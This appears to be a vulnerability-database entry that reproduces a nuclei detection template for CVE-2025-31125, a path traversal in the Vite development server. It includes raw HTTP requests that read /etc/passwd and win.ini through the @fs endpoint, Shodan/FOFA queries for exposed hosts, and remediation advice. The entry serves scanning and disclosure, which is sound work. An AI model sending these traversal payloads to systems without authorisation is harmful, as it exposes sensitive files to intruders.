Lucene search
K

Vite Development Server - Path Traversal

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Path traversal in Vite Development Server allows access to sensitive files via crafted URLs.

Related
Refs
Code
id: CVE-2025-31125

info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  impact: |
    Attackers can exploit path traversal in the @fs endpoint to access files outside the intended directory when the Vite dev server is exposed to the network, potentially reading sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    epss-score: 0.58765
    epss-percentile: 0.98994
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi,vkev,vuln,kev

http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and

      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 4b0a00483046022100d9cc9f517f481e0205ed5dac30e40f6b2a7d14ab37dd8269527a320601198d2d022100eb38b2bdea444ceebe6c42eeee024479e6f459d66410094fb3367a0fae6363a2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.15.3 - 7.5
EPSS0.58765
SSVC
22